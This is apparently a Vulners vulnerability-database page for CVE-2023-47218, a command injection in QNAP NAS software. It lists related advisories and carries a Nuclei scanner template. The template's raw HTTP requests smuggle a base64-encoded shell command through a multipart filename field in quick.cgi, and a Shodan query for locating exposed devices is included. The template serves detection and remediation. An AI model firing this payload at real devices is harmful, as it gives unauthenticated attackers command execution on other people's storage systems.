| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| QNAP QTS / QuTS Hero Unauthenticated Remote Code Execution Exploit | 22 Feb 202400:00 | – | zdt | |
| The vulnerability of the Quick.cgi file allows attackers to execute arbitrary commands on QTS, QuTS hero, and QuTScloud operating systems for network devices from Qnap. | 17 Apr 202400:00 | – | bdu_fstec | |
| CVE-2023-47218 | 13 Feb 202404:31 | – | circl | |
| Command Injection Vulnerabilities in Various QNAP Products | 13 Feb 202400:00 | – | cnnvd | |
| CVE-2023-47218 | 13 Feb 202402:44 | – | cve | |
| CVE-2023-47218 QTS, QuTS hero, QuTScloud | 13 Feb 202402:44 | – | cvelist | |
| QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi | 21 Feb 202419:49 | – | metasploit | |
| CVE-2023-47218 | 13 Feb 202403:15 | – | nvd | |
| QNAP QTS Multiple OS Command Injection Vulnerabilities (QSA-23-57) - Version Check | 13 Feb 202400:00 | – | openvas | |
| QNAP QuTS hero Multiple OS Command Injection Vulnerabilities (QSA-23-57) - Version Check | 13 Feb 202400:00 | – | openvas |
id: CVE-2023-47218
info:
name: QNAP QTS and QuTS Hero - OS Command Injection
author: ritikchaddha
severity: medium
description: |
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
impact: |
Unauthenticated attackers on the local network can execute arbitrary commands remotely, potentially compromising NAS devices and stored data.
remediation: |
Update to QTS 5.1.5.2645 build 20240116 or later, QuTS hero h5.1.5.2647 build 20240118 or later, or QuTScloud c5.1.5.2651 or later.
reference:
- https://github.com/passwa11/CVE-2023-47218
- https://twitter.com/win3zz/status/1760224052289888668/photo/3
- https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
- https://nvd.nist.gov/vuln/detail/CVE-2023-47218
- https://www.qnap.com/en/security-advisory/qsa-23-57
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 5.8
cve-id: CVE-2023-47218
cwe-id: CWE-77
epss-score: 0.89157
epss-percentile: 0.99763
cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
product: qts
vendor: qnap
tags: cve,cve2023,qnap,qts,quts,rce,intrusive,vkev,vuln
variables:
file: '{{rand_base(6)}}'
cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'
http:
- raw:
- |
POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary="avssqwfz"
--avssqwfz
Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
Content-Type: text/plain
skfqduny
--avssqwfz–
- |
POST /cgi-bin/quick/{{file}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_1, "code\": 200", "full_path_filename success")'
- 'contains_all(body_2, "uid=", "gid=")'
- 'status_code == 200'
condition: and
# digest: 490a004630440220762204d86f68dcdaf84964706dab51518b07f7bfc1df6a83ac2c1d6e774051c1022020d8e79e4b3c4bc87bb00f0b66924f56fa815e8b911569289e207fd4568ae215:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation